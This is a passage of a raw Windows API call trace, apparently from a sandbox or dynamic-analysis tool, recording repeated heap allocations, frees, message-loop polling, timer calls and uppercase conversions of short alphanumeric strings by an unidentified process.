(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.605] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.605] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.605] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.605] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.606] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.606] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.606] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 1 [0206.607] TranslateMessage (lpMsg=0x8bef00) returned 0 [0206.607] DispatchMessageW (lpMsg=0x8bef00) returned 0x0 [0206.607] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0206.607] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0206.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.607] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.608] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.608] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.609] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.609] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.609] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.610] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.610] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.610] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.611] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.611] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.613] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.613] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.613] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.614] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.615] HeapFree (in: 